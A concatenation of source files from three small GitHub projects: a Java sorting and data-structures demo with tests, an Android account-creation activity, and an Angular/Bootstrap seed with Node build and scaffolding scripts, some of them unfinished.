protected Node getNext() {
return next;
}
private void setNext(Node next) {
this.next = next;
}
}
}
<file_sep>package org.dongtech.datastructures.list;
import java.io.Serializable;
/**
* @author Fuqiang
* Created on 27/02/2018.
*/
public class LListRevised<T> extends LinkedChainBase<T> implements ListInterface<T>, Serializable {
private Node firstNode;
private int length = 0;
public LListRevised() {
clear();
}
@Override
public boolean add(int position, T newEntry) {
return false;
}
@Override
public T remove(int position) {
T result = null;
if (position >= 1 && position <= getLength()) {
assert !isEmpty();
if (position == 1) {
result = removeFirstNode();
} else {
Node nodeBefore = getNodeAt(position - 1);
result = removeAfterNode(nodeBefore);
}
}
return result;
}
@Override
public T getEntry(int position) {
return null;
}
@Override
public void clear() {
firstNode = null;
length = 0;
}
@Override
public int getLength() {
return length;
}
@Override
public boolean isEmpty() {
return false;
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 13/02/2018.
*/
public class ShellSortTest {
public static void main(String... args) {
String[] arr = {"9", "6", "2", "4", "8"};
SortArray.shellSort(arr, arr.length);
System.out.print(Arrays.toString(arr));
}
}
<file_sep>package org.dongtech.javacore.generic;
/**
* @author Fuqiang
* Created on 30/01/2018.
*/
public class Singleton<T> {
public static <T> T getSingleInstance(T a) {
return a;
}
}
<file_sep>package org.dongtech.datastructures.graph;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
/**
* @author Fuqiang
* Created on 2018/5/10.
*/
class DirectedGraphTest {
private Graph graph ;
@BeforeEach
void setUp() {
this.graph = new DirectedGraph();
}
@Test
void addNode() {
}
@Test
void addEdge() {
}
}
<file_sep>package org.dongtech.datastructures;
/**
* @author Fuqiang
* Created on 01/02/2018.
*/
public class Widget implements Comparable<Widget>{
public int compareTo(Widget o) {
return 0;
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
class SortArrayTest {
private String[] arr;
@BeforeEach
void setUp() {
this.arr = new String[]{"9", "6", "2", "4", "8"};
}
@Test
void sort() {
}
@Test
void quickSort() {
}
@Test
void mergeSort() {
}
@Test
void sort1() {
}
@Test
void shellSort() {
}
@Test
void shellSort1() {
}
@Test
void insertionSort() {
}
@Test
void selectionSort2() {
}
@Test
void selectionSort() {
}
@Test
void isSorted() {
}
@Test
void radixSort() {
}
@Test
void bubbleSort() {
SortArray.bubbleSort(this.arr, 5);
}
@Test
void bubbleSort1() {
SortArray.bubbleSort(this.arr, 0, 4);
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 24/02/2018.
*/
public class RadixSortTest extends BaseTest {
public static void main(String[] args) {
int length = 1000000;
int index = 0;
int[] a = new int[length];
while (index < length) {
a[index++] = (int) (Math.random() * 1000);
}
log("Radix Sort Start...");
long start = System.currentTimeMillis();
SortArray.radixSort(a, 0, length - 1, 3);
long end = System.currentTimeMillis();
log("Radix Sort End.");
// log("Result: " + (SortArray.isSorted(a) ? "Success" : "Fail"));
log("Result: " + Arrays.toString(a));
log("Duration: " + (end - start) + " ms");
}
}
<file_sep>package org.dongtech.javacore.multithreads;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
/**
* @author Fuqiang
* Created on 2018/5/11.
*/
class MyBankTest {
private Bank bank;
@BeforeEach
void setUp() {
this.bank = new MyBank(10, 150);
}
@Test
void transfer() {
try {
this.bank.transfer(0, 1, 100);
} catch (InterruptedException e) {
e.printStackTrace();
}
assertEquals(50, this.bank.getBalance(0));
}
@Test
void getTotalBalance() {
this.bank.getTotalBalance();
}
@Test
void size() {
int size = this.bank.size();
assertEquals(10, size);
}
}
<file_sep>package org.dongtech.datastructures;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
public class Student {
private String name;
private Integer grade;
private String code;
private Double avgScore;
public Student(String name, Integer grade, String code, Double avgScore) {
this.name = name;
this.grade = grade;
this.code = code;
this.avgScore = avgScore;
}
@Override
public String toString() {
return "Student{" +
"name='" + name + '\'' +
", grade=" + grade +
", code='" + code + '\'' +
", avgScore=" + avgScore +
'}';
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Integer getGrade() {
return grade;
}
public void setGrade(Integer grade) {
this.grade = grade;
}
public String getCode() {
return code;
}
public void setCode(String code) {
this.code = code;
}
public Double getAvgScore() {
return avgScore;
}
public void setAvgScore(Double avgScore) {
this.avgScore = avgScore;
}
}
<file_sep>package org.dongtech.datastructures.graph;
/**
* @author Fuqiang
* Created on 2018/5/10.
*/
public class DirectedGraph implements Graph {
}
<file_sep>package org.dongtech.datastructures.list;
import org.dongtech.datastructures.Comparator;
/**
* @author Fuqiang
* Created on 29/01/2018.
*/
public class SortArray {
private static int MIN_SIZE = 4;
/**
* 定义一个泛型方法,该方法要求泛型的实例是一个实现了Comparable接口的类型
* Comparable<? super T> 表示,这个实例可以不直接实现Comparable接口,而是通过其父类实现Comparable接口
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void sort(T[] a, int n) {
}
/**
* 快速排序递归实现
*
* @param a
* @param first
* @param last
* @param <T>
*/
public static <T extends Comparable<? super T>> void quickSort(T[] a, int first, int last) {
if (last - first + 1 < MIN_SIZE) {
insertionSort(a, first, last);
} else {
int pivotIndex = partition(a, first, last);
quickSort(a, first, pivotIndex - 1);
quickSort(a, pivotIndex, last);
}
}
/**
* 将数组划分为由支点分隔的两个子数组,左边数组的所有元素小于等于支点,右边数组的所有元素大于等于支点
*
* @param a
* @param first
* @param last
* @param <T>
* @return
*/
private static <T extends Comparable<? super T>> int partition(T[] a, int first, int last) {
int mid = (first + last) / 2;
sortFirstMiddleLast(a, first, mid, last);
swap(a, mid, last - 1);
int pivotIndex = last - 1;
T pivot = a[pivotIndex];
int indexFromLeft = first + 1;
int indexFromRight = last - 2;
boolean done = false;
while (!done) {
while (a[indexFromLeft].compareTo(pivot) < 0) {
indexFromLeft++;
}
while (a[indexFromRight].compareTo(pivot) > 0) {
indexFromRight--;
}
assert a[indexFromLeft].compareTo(pivot) >= 0 && a[indexFromRight].compareTo(pivot) <= 0;
if (indexFromLeft < indexFromRight) {
swap(a, indexFromLeft, indexFromRight);
indexFromLeft++;
indexFromRight--;
} else {
done = true;
}
}
swap(a, pivotIndex, indexFromLeft);
pivotIndex = indexFromLeft;
return pivotIndex;
}
/**
* 三点取中值支点选择法
*
* @param a
* @param first
* @param middle
* @param last
* @param <T>
*/
private static <T extends Comparable<? super T>> void sortFirstMiddleLast(T[] a, int first, int middle, int last) {
order(a, first, middle);
order(a, middle, last);
order(a, first, middle);
}
private static <T extends Comparable<? super T>> void order(T[] a, int i, int j) {
if (a[i].compareTo(a[j]) > 0) {
swap(a, i, j);
}
}
/**
* 归并排序递归实现,效率O(n logn)
*
* @param a
* @param first
* @param last
* @param <T>
*/
public static <T extends Comparable<? super T>> void mergeSort(T[] a, int first, int last) {
T[] tempArray = (T[]) new Comparable[a.length];
mergeSort(a, tempArray, first, last);
}
private static <T extends Comparable<? super T>> void mergeSort(T[] a, T[] tempArray, int first, int last) {
if (first < last) {
int mid = (first + last) / 2;
mergeSort(a, tempArray, first, mid);
mergeSort(a, tempArray, mid + 1, last);
merge(a, tempArray, first, mid, last);
}
}
private static <T extends Comparable<? super T>> void merge(T[] a, T[] tempArray, int first, int mid, int last) {
if (a[mid].compareTo(a[mid + 1]) <= 0) {
//如果左边有序数组的最大值小于等于右边有序数组的最小值,则不执行归并.
return;
}
int beginHalf1 = first;
int beginHalf2 = mid + 1;
int index = 0;
while (beginHalf1 <= mid && beginHalf2 <= last) {
if (a[beginHalf1].compareTo(a[beginHalf2]) < 0) {
tempArray[index++] = a[beginHalf1++];
} else {
tempArray[index++] = a[beginHalf2++];
}
}
while (beginHalf1 <= mid) {
tempArray[index++] = a[beginHalf1++];
}
while (beginHalf2 <= last) {
tempArray[index++] = a[beginHalf2++];
}
index = 0;
while (first <= last) {
a[first++] = tempArray[index++];
}
}
/**
* 一个可以自定定义比较器的冒泡排序法
*
* @param a
* @param comparator
* @param <T>
*/
public static <T> void sort(T[] a, Comparator<T> comparator) {
for (int i = a.length; i >= 0; i--) {
for (int j = 1; j < i; j++) {
if (comparator.compare(a[j - 1], a[j]) > 0) {
swap(a, j - 1, j);
}
}
}
}
private static void swap(Object[] a, int i, int j) {
if (i != j) {
Object tmp = a[i];
a[i] = a[j];
a[j] = tmp;
}
}
/**
* 冒泡排序
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void bubbleSort(T[] a, int n) {
// for (int i = n; i >= 0; i--) {
// for (int j = 1; j < i; j++) {
// if (a[j - 1].compareTo(a[j]) > 0) {
// swap(a, j - 1, j);
// }
// }
// }
bubbleSort(a, 0, n - 1);
}
public static <T extends Comparable<? super T>> void bubbleSort(T[] a, int first, int last) {
if (first < last) {
int index = bubble(a, first, last);
bubbleSort(a, first, index);
}
}
/**
* @param a
* @param first
* @param last
* @param <T>
* @return 返回最后一次交换中,左边元素的索引
*/
private static <T extends Comparable<? super T>> int bubble(T[] a, int first, int last) {
int index = first;
for (int i = first; i < last; i++) {
if (a[i].compareTo(a[i + 1]) > 0) {
swap(a, i, i + 1);
index = i;
}
}
return index;
}
/**
* 希尔排序
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void shellSort(T[] a, int n) {
shellSort(a, 0, n - 1);
}
public static <T extends Comparable<? super T>> void shellSort(T[] a, int first, int last) {
if (first < last) {
int n = last - first + 1;
for (int space = n / 2; space > 0; space = space / 2) {
int tmp = space % 2 == 0 ? space + 1 : space;
for (int begin = first; begin < first + tmp; begin++) {
incrementalInsertionSort(a, begin, last, tmp);
}
}
}
}
private static <T extends Comparable<? super T>> void incrementalInsertionSort(T[] a, int first, int last, int
space) {
int unsorted, index;
for (unsorted = first + space; unsorted <= last; unsorted = unsorted + space) {
T firstUnsorted = a[unsorted];
for (index = unsorted - space; (index >= first) && (firstUnsorted.compareTo(a[index]) < 0); index = index -
space) {
a[index + space] = a[index];
}
a[index + space] = firstUnsorted;
}
}
/**
* insertion sort
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void insertionSort(T[] a, int n) {
insertionSort(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void insertionSort(T[] a, int first, int last) {
// for (int i = first + 1; i <= last; i++) {
// T firstUnsorted = a[i];
// insertInOrder(firstUnsorted, a, first, i);
// }
if (first < last) {
// T firstUnsorted = a[first + 1];
// insertInOrder(firstUnsorted, a, 0, first);
// insertionSort(a,first+1,last);
insertionSort(a, first, last - 1);
insertInOrder(a[last], a, first, last - 1);
}
}
private static <T extends Comparable<? super T>> void insertInOrder(T element, T[] a, int first, int last) {
// for (int i = last; i >= first; i--) {
// if (element.compareTo(a[i]) < 0) {
// a[i + 1] = a[i];
// } else {
// a[i + 1] = element;
// break;
// }
// }
// int index = last;
// while (index >= first && element.compareTo(a[index]) < 0) {
// a[index + 1] = a[index];
// index--;
// }
// a[index + 1] = element;
if (element.compareTo(a[last]) >= 0) {
a[last + 1] = element;
} else {
a[last + 1] = a[last];
if (first < last) {
insertInOrder(element, a, first, last - 1);
} else {
a[last] = element;
}
}
}
/**
* 优化的选择排序,每次选择中,选出最大值与最小值,分别与数组的首尾元素交换位置
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void selectionSort2(T[] a, int n) {
selectionSort2(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void selectionSort2(T[] a, int first, int last) {
if (last > first) {
int min = first;
int max = first;
for (int i = first + 1; i < last; i++) {
if (a[i].compareTo(a[min]) < 0) {
min = i;
} else if (a[i].compareTo(a[max]) > 0) {
max = i;
}
}
swap(a, first, min);
if (first == max) {
max = min;
}
swap(a, last, max);
selectionSort2(a, first + 1, last - 1);
}
}
/**
* selection sort
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void selectionSort(T[] a, int n) {
// for (int index = 0; index < n - 1; index++) {
// int indexOfNextSmallest = getIndexOfSmallest(a, index, n - 1);
// swap(a, index, indexOfNextSmallest);
// }
selectionSort(a, 0, n - 1);
}
private static <T extends Comparable<? super T>> void selectionSort(T[] a, int first, int last) {
if (first < last) {
int indexOfNextSmallest = getIndexOfSmallest(a, first, last);
swap(a, first, indexOfNextSmallest);
selectionSort(a, ++first, last);
}
}
private static <T extends Comparable<? super T>> int getIndexOfSmallest(T[] a, int first, int last) {
T min = a[first];
int indexOfMin = first;
for (int index = first + 1; index <= last; index++) {
if (min.compareTo(a[index]) > 0) {
min = a[index];
indexOfMin = index;
}
}
return indexOfMin;
}
/**
* 检测给定的数组是否有序,左小右大
*
* @param a
* @param <T>
* @return
*/
public static <T extends Comparable<? super T>> boolean isSorted(T[] a) {
for (int i = 1; i < a.length; i++) {
if (a[i - 1].compareTo(a[i]) > 0) {
return false;
}
}
return true;
}
/**
* 基数排序,效率O(n)
*
* @param a
* @param first
* @param last
* @param maxDigits
*/
public static void radixSort(int[] a, int first, int last, int maxDigits) {
int length = last - first + 1;
int[][] buckets = new int[10][length];
int[] bucketIndex = new int[10];
int digit = 0;//当前位
while (digit < maxDigits) {
int index = first;
while (index <= last) {
int element = a[index];
int digitValue = (element / (int) Math.pow(10, digit)) % 10;
buckets[digitValue][bucketIndex[digitValue]] = element;
bucketIndex[digitValue]++;
index++;
}
index = first;
for (int i = 0; i < 10; i++) {
for (int j = 0; j < bucketIndex[i]; j++) {
a[index] = buckets[i][j];
index++;
}
}
buckets = new int[10][length];//清空
bucketIndex=new int[10];//清空
digit++;
}
}
}
<file_sep># data-structures-java-demo
| b363268b6b6bd4651684092459ceeca9125f5f05 | [
"Markdown",
"Java"
] | 16 | Java | frankdong80/data-structures-java-demo | 4b0d276870edd380347deb199bbdfdb8e97c8a5c | 0127a3f50b3468740b2875d0e312c7069b3cc774 |
refs/heads/master | <repo_name>AlexanderDWz/WGFinder<file_sep>/app/src/main/java/hs/karlsruhe/wgfinder/Account_erstellen.java
package hs.karlsruhe.wgfinder;
import android.content.Intent;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.view.Menu;
import android.view.View;
public class Account_erstellen extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_account_erstellen);
setTitle("Account erstellen");
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.menu_main, menu);
return true;
}
public void sendMessage(View view)
{
Intent intent = new Intent(this,MainActivity.class);
startActivity(intent);
}
}
| a897e304d2aec6d1fccec7179c24d3f657161c3b | [
"Java"
] | 1 | Java | AlexanderDWz/WGFinder | 1e88807d0fbcaa1b3a7e70000a7ef19b875340ae | 996bf11fa17f153520bdae47014fcc81e9abaeca |
refs/heads/master | <repo_name>jls14/bootstrap-angular-seed<file_sep>/scripts/build.js
console.log("start build");
var fs = require('fs');
var path = require('path');
var copy = require('recursive-copy');
var uglify = require("uglify-js");
var execSync = require('child_process').execSync;
var cleanCss = new (require('clean-css'))({});
var filePath = path.join(__dirname, '../src/index.html');
if(fs.existsSync(path.join(__dirname, '../dist'))){
execSync('rm -rf ' + path.join(__dirname, '../dist'));
}
fs.mkdirSync(path.join(__dirname, '../dist'));
var bundleJs = path.join(__dirname, '../dist/bundle.js');
var bundleCss = path.join(__dirname, '../dist/bundle.css');
var index = path.join(__dirname, '../dist/index.html');
fs.writeFile(index, '', encoding='utf8');
fs.writeFile(bundleJs, '', encoding='utf8');
fs.writeFile(bundleCss, '', encoding='utf8');
fs.readFileSync(filePath).toString().split('\n').forEach(function(line){
if(/script\s*src="\.\.\/(.*?)"/.test(line)){
var exec = /script\s*src="\.\.\/(.*?)"/.exec(line);
var minJs = uglify.minify(fs.readFileSync(""+exec[1]).toString()).code;
fs.appendFileSync(bundleJs, minJs);
} else if(/script\s*src="(.*?)"/.test(line)) {
var exec = /script\s*src="(.*?)"/.exec(line);
var minJs = uglify.minify(fs.readFileSync("src/"+exec[1]).toString()).code;
fs.appendFileSync(bundleJs, minJs);
} else if(/link\s*href="\.\.\/(.*?)"/.test(line)){
var exec = /link\s*href="\.\.\/(.*?)"/.exec(line);
var minCss = cleanCss.minify(fs.readFileSync(exec[1]).toString()).styles;
fs.appendFileSync(bundleCss, minCss);
} else if(/link\s*href="(.*?)"/.test(line)) {
var exec = /link\s*href="(.*?)"/.exec(line);
var minCss = cleanCss.minify(fs.readFileSync("src/"+exec[1]).toString()).styles;
fs.appendFileSync(bundleCss, minCss);
} else {
fs.appendFileSync(index, line);
}
if(/<head>/.test(line)){
fs.appendFileSync(index,"<script src=\"bundle.js\"></script>");
fs.appendFileSync(index,"<link href=\"bundle.css\" rel=\"stylesheet\" />");
}
});
copy('src', 'dist', {filter: ['**/**.html', '!**/index.html']}, function(error, results) {
if (error) {
console.error('Copy failed: ' + error);
} else {
console.info(results);
console.log("It's Alive!");
}
});
<file_sep>/src/components/navbar.component/navbar.component.js
(function(){
'use strict'
angular
.module('navbar.component', [])
.directive('navbarComponent', [function(){
return {
templateUrl: "components/navbar.component/navbar.component.html",
controller: "NavbarController",
controllerAs: "navbarCtrl"
};
}])
.controller('NavbarController', [function(){
}])
})()
<file_sep>/scripts/add-service.js
var name = process.argv[process.argv.indexOf("--name")+1]
var serviceName= process.argv[process.argv.indexOf("--name")+1]+".service";
var scName = "";
var abbrevName = "";
name.split('.').forEach(function(line){
abbrevName += line.substring(0,1);
scName += line.substring(0,1).toUpperCase() + name.substring(1);
});
var fs = require('fs');
var path = require('path');
var execSync = require('child_process').execSync;
var index = path.join(__dirname, '../src/index.html');
var index2 = path.join(__dirname, '../src/index2.html');
var serviceDir = path.join(__dirname, '../src/services');
var serviceJs = serviceDir+'/'+serviceName+'.js';
fs.mkdirSync(serviceDir);
fs.writeFile(serviceJs, `
(function(){
'use strict'
angular
.module('${serviceName}', [])
.service('${scName}Service', [function(){
var $svc=this;
}]);
})();
`, encoding='utf-8');
var isAdded=false
fs.writeFile(index2, '', encoding='utf8');
fs.readFileSync(index).toString().split('\n').forEach(function(line){
if(/--services--/.test(line) && !isAdded){
isAdded=true;
fs.appendFileSync(index2, line+"\n");
fs.appendFileSync(index2,"<script src=\"services/"+serviceName+".js\"></script>\n");
}
else if(/\/head/.test(line) && !isAdded){
isAdded=true;
fs.appendFileSync(index2,"<script src=\"services/"+serviceName+".js\"></script>\n");
fs.appendFileSync(index2, line+"\n");
}
else{
fs.appendFileSync(index2, line+"\n");
}
});
execSync('mv -f '+index2+' '+index);
console.log("dont forget to add ${serviceName} to app.js modules");
<file_sep>/README.md
# bootstrap-angular-seed
Minimal Angular Seed Project. Only Angular and Bootstrap dependencies, and a simple build script in pure nodejs.
<file_sep>/src/services/config.service.js
(function(){
'use strict'
angular
.module('config.service', [])
.service('ConfigService', ['$http',function($http){
var $svc=this;
//default build.json
$svc.build = {"version": (new Date()).getTime()};
//default config.json
$svc.config = {};
$svc.getVersion = function(){
return $svc.build.version;
};
//get config if available
$http.get("./config.json")
.then(
function(promise){
$svc.config = promise.data;
angular.ConfigService=$svc;
}
);
//get build if available
$http.get("./build.json")
.then(
function(promise){
$svc.build = promise.data;
angular.ConfigService=$svc;
}
);
angular.ConfigService=$svc;
}]);
})();
<file_sep>/src/app.js
(function(){
'use strict'
angular
.module('app', [
'ngRoute',
'ngAnimate',
'config.service',
'api.service',
'navbar.component',
'main.view'
])
.config(['$locationProvider', '$routeProvider', function($locationProvider, $routeProvider) {
$routeProvider.otherwise({redirectTo: '/main'});
}]);
})();
<file_sep>/scripts/add-component.js
var name = process.argv[process.argv.indexOf("--name")+1]
var viewName= process.argv[process.argv.indexOf("--name")+1]+".component";
var ucName = "";
var compName = "";
var abbrevName = "";
name.split('.').forEach(function(line){
abbrevName += line.substring(0,1);
ucName += line.substring(0,1).toUpperCase() + name.substring(1);
});
abbrevName = ucName.substring(0,1).toLowerCase() + ucName.substring(1);
var fs = require('fs');
var path = require('path');
var execSync = require('child_process').execSync;
var index = path.join(__dirname, '../src/index.html');
var index2 = path.join(__dirname, '../src/index.2.html');
var viewDir = path.join(__dirname, '../src/components/'+viewName);
var viewCss = viewDir+'/'+viewName+'.css';
var viewJs = viewDir+'/'+viewName+'.js';
var viewHtml = viewDir+'/'+viewName+'.html';
fs.mkdirSync(viewDir);
fs.writeFile(viewCss, '', encoding='utf-8');
fs.writeFile(viewHtml, `
<div class="${viewName.replace('.', '-')}">
<h1>${ucName}</h1>
</div>
`, encoding='utf-8');
fs.writeFile(viewJs, `
(function(){
'use strict'
angular
.module('${viewName}', ['ngRoute', 'ngAnimate', 'ui.bootstrap'])
.directive('${compName}', [function(){
return {
restrict: 'E',
controller: '${ucName}ComponentController',
controllerAs: '${abbrevName}cCtrl',
templateUrl: 'components/${viewName}/${viewName}.html'
};
}])
.controller('${ucName}ComponentController', [function(){
var $ctrl=this;
}]);
})();
`, encoding='utf-8');
var isAdded=false;
fs.writeFile(index2, '', encoding='utf8');
fs.readFileSync(index).toString().split('\n').forEach(function(line){
if(/--components--/.test(line) && !isAdded){
fs.appendFileSync(index2, line+"\n");
isAdded=true;
fs.appendFileSync(index2,"<script src=\""+viewName+".js\"></script>\n");
fs.appendFileSync(index2,"<link href=\""+viewName+".css\" rel=\"stylesheet\" />\n");
}
else if(/\/head/.test(line) && !isAdded){
isAdded=true;
fs.appendFileSync(index2,"<script src=\""+viewName+".js\"></script>\n");
fs.appendFileSync(index2,"<link href=\""+viewName+".css\" rel=\"stylesheet\" />\n");
fs.appendFileSync(index2, line+"\n");
}
else{
fs.appendFileSync(index2, line+"\n");
}
});
execSync('mv -f '+index2+' '+index);
console.log("dont forget to add ${viewName} to app.js modules);
<file_sep>/src/views/main.view/main.view.js
(function(){
'use strict'
angular
.module('main.view', ['ngRoute', 'ngAnimate', 'ui.bootstrap', 'config.service'])
.config(['$routeProvider', function($routeProvider) {
$routeProvider.when('/main', {
templateUrl: 'views/main.view/main.view.html',
controller: 'MainController',
controllerAs: 'mainCtrl'
});
}])
.controller('MainController', [function(){
var $ctrl=this;
}]);
})()
<file_sep>/src/services/api.service.js
(function(){
'use strict'
angular
.module('api.service', [])
.service('ApiService', ['$http', function($http){
}]);
})()
| d54ce7fa0647e18243e7d56bb16d775657a3e3e6 | [
"JavaScript",
"Markdown"
] | 9 | JavaScript | jls14/bootstrap-angular-seed | f1a46acf6ca5814a5a1f14bb2998a6b127537283 | 2480f9466cecf5a3a291033c115a495184c72ac0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.